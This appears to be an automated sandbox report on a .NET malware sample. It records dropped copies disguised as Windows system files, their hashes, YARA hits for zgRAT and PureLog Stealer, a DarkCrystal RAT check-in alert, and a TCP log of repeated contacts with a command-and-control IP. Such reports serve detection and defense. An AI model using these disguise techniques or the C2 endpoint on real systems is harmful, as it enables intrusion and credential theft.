                                                                                                                          Preview:aO7oQbcgD6jbeljUI7zyHfiPcFbrQ4PMN5faBVRBToxjakVywOs4kKk5prLLAvQIqXNiFJTwqxecr8z2tn4BMVlDVkuTKFBiXo2CWxsn56OxpHOq2TbW1P6VwKMfYAmkv5ECFxf64QGQHyXNVDa1noqIrhPLkNP5TnBuCLkFxfclIqO8x9JUjv7HO5UihUVqBL6exnKKdVDILFABSRYlD4Vip3fH1CidJwk7uuLKy91Nry5I5TPP5tmGzXy3HDSbxk8ZfDQiGOxDDI118WLhwShaJdHX6SCuqaaG0fn2DrJr6jDrg74v2voeDiQC53myMCXnruActTeFJzdkaa08XQ25v5CSPk6KEVf4LZ9v6cCiRjVNEplfCnb5Jb1vssMIWTAxUjYAaFC4OTnMjyNk9aHa4juuiOCNP3M7ih3fRkF6kgr0ypL3fmJ5Mj3uyocMCypUHqnC5rSYVLzY2462CJsnuQv8oIrnI33v0WsHCJ8xTukAtf23sjK3GBk14oYwApPbRDhfMy02L4T9quOIQx5jtApyw1MXvLxnfIsq8Xr3sRsLrkKKZPgMuqsRYssUlcG9GqehCiJ3FB0bRdGLqC8gpl2yaaRQoXSPLsEBGnI0FnHtzQ94lhoiekTfxpHlR3OsskQjYFFC4HaCdJ8JaWoGttvlYjOaggjMYZAOAaggclnWKRCnq7K4PH99zoKz0ogXiNoE

                                                                                                                          C:\Windows\LiveKernelReports\UserOOBEBroker.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1914880
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          MD5:86AF92730370230540800E6D509E4155
                                                                                                                          SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                          SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                          SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                          C:\Windows\LiveKernelReports\UserOOBEBroker.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:true
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          C:\Windows\SchCache\9e8d7a4ca61bd9

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):145
                                                                                                                          Entropy (8bit):5.644733573516344
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:t3/S32ug8mjkj/qWGNl3uRDSIyqvu7TwXE9NRDqnrDq7mvKw4Kl:txuGY2vNl+NjvawUJ2nrDq7YKrKl
                                                                                                                          MD5:3741A6C9888B18F68BFF0F55411D882C
                                                                                                                          SHA1:F2EC60189E2A031D145C84DA26812381307E8094
                                                                                                                          SHA-256:CD0AB8C81ECE40F8158FE4DC654D6F370EC7CEBA7217B34A22EF1401298BD469
                                                                                                                          SHA-512:0BA30456ED17F7BCC4C9F269193EFC456557533A7A5E5C7D784811638BB99C157533A59E2BBAB5BF5762BCD501DDA3E41F6807BF80DD20298ADBEF41A6790222
                                                                                                                          Malicious:false
                                                                                                                          Preview:kY3F2yosRL47qKSKEQ4WAWIHmpNOZcwreCN6apKO34EGihXU3R0atQHOQwcMkZSzYNdo6WuZGqdFRBiFS2UImV7O48qoN7ndmOsUEtXhgaTCwC7ONX4sEJNCQOt8pFMJD9dDTNAjexmLC5b2B

                                                                                                                          C:\Windows\SchCache\RuntimeBroker.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1914880
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          MD5:86AF92730370230540800E6D509E4155
                                                                                                                          SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                          SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                          SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@..................................O..K....`.. ............................................................................ ............... ..H............text..../... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B.................O......H...........<...........0....n...O.......................................0..........(.... ........8........E....M...).......N...8H...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....*(.... ....8........0.......... ........8........E....d.......................8_...~....:.... ....~r...{j...9....& ....8....~....(C... .... .... ....s....~....(G....... ....8.......... ....~r...{....:e...& ....8Z.......~....(K...~....(O... ....<.... ....8....r...ps....z*8...

                                                                                                                          C:\Windows\SchCache\RuntimeBroker.exe:Zone.Identifier

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\U1jaLbTw1f.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):26
                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                          Malicious:false
                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                          \Device\Null

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.8548847429470365
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXAN6QQbXWNQQLRvrDbRvj:Vx993DEUtNcXapN
                                                                                                                          MD5:F75F3AE01DA3688C7C14F69611C0C1FA
                                                                                                                          SHA1:A9CAA0146AFFB4DC9AA38E388365B899D089A0E0
                                                                                                                          SHA-256:9EB9B73C3E3315015A916BA2F27BD2A4406A30EDE0DE608589A2CD9A0591807F
                                                                                                                          SHA-512:196CFFFA2F62DEFACC613A97F51F827A059D69B74D0F3D42FFF60AE6D83A0A26EBEC6E37F8D823C5A5C3296151D6FB42EA07648187F30264FE68E7D4B52D47F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/12/2024 23:46:55..23:46:55, error: 0x80072746.23:47:00, error: 0x80072746.

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.534170827701139
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          File name:U1jaLbTw1f.exe
                                                                                                                          File size:1'914'880 bytes
                                                                                                                          MD5:86af92730370230540800e6d509e4155
                                                                                                                          SHA1:06083ba4be5095fb3e43c12ef9cd57468cfa8898
                                                                                                                          SHA256:fa545f3f6fa282dbe529483bb3fac3dae0ea6c466a7bcb0bb7f843622bec7177
                                                                                                                          SHA512:110ad5965f9b84f827673f252c8bdbd1080c938ad32565238e8eb754d5b5fd86d82ce1742f2879104d3dd8111f3693441944be39180929a7fa5c30dfcfecf3ac
                                                                                                                          SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                          TLSH:83959E1665924F33D36457338597023D8290DB2A3622FB1F3A1F14D2A91B7F29F722A7
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag.................0...........O... ...`....@.. ....................................@................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x5d4fee
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6761D718 [Tue Dec 17 19:55:04 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1d4fa00x4b.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d60000x320.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d80000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000x1d2ff40x1d3000985cc82dca44417f043d2a7af92cc746False0.7778613072135975data7.537640943300724IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x1d60000x3200x4003720f37e3ecb95f78fcf18a649002524False0.3525390625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .reloc0x1d80000xc0x2003d087c0c906fa1c1b526b51755ac2e43False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_VERSION0x1d60580x2c8data0.46207865168539325

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-01T04:22:07.349696+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730104.21.38.8480TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 1, 2025 04:22:06.822468996 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:06.827353001 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:06.827420950 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:06.827776909 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:06.832554102 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.178580999 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:07.183389902 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.272933960 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.349695921 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:07.567734957 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.567765951 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.567826033 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:07.599464893 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:07.604293108 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.693603039 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.693814039 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:07.698627949 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:07.960797071 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.016643047 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.021454096 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.034033060 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.038820982 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.042088985 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.042088985 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.046921968 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.110564947 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.110832930 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.115683079 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.383697033 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.398179054 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.403026104 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.403162956 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.429469109 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.501847029 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.517463923 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.518198967 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.522577047 CET8049730104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.522891045 CET4973080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.522980928 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.523140907 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.523140907 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.527931929 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.615309954 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.757385969 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.881628036 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.912180901 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.994477034 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.994489908 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:08.994509935 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:08.994787931 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.115303993 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.361646891 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.471405983 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.550453901 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.550508022 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.551193953 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.555447102 CET8049731104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.555491924 CET4973180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.555814028 CET8049734104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.555854082 CET4973480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.556075096 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.556132078 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.556725979 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.561486006 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:09.923898935 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:09.928809881 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.233733892 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.251768112 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.251869917 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.319259882 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.321667910 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.326626062 CET8049735104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.326725006 CET4973580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.506402016 CET4973780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.511183977 CET8049737104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.511259079 CET4973780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.511476040 CET4973780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.516222954 CET8049737104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.730000019 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.734813929 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.734906912 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.735229969 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.735677958 CET4973780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.740025043 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.783807039 CET8049737104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.910624981 CET4973980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.915492058 CET8049739104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.915823936 CET4973980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.915914059 CET4973980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:10.920608997 CET8049739104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.949584007 CET8049737104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:10.949785948 CET4973780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:11.084399939 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:11.089253902 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089273930 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089282990 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089293003 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089302063 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089437008 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089441061 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:11.089447021 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089488983 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089497089 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089508057 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:11.089524031 CET8049738104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:22:11.089550972 CET4973880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:22:11.089576006 CET4973880192.168.2.4104.21.38.84
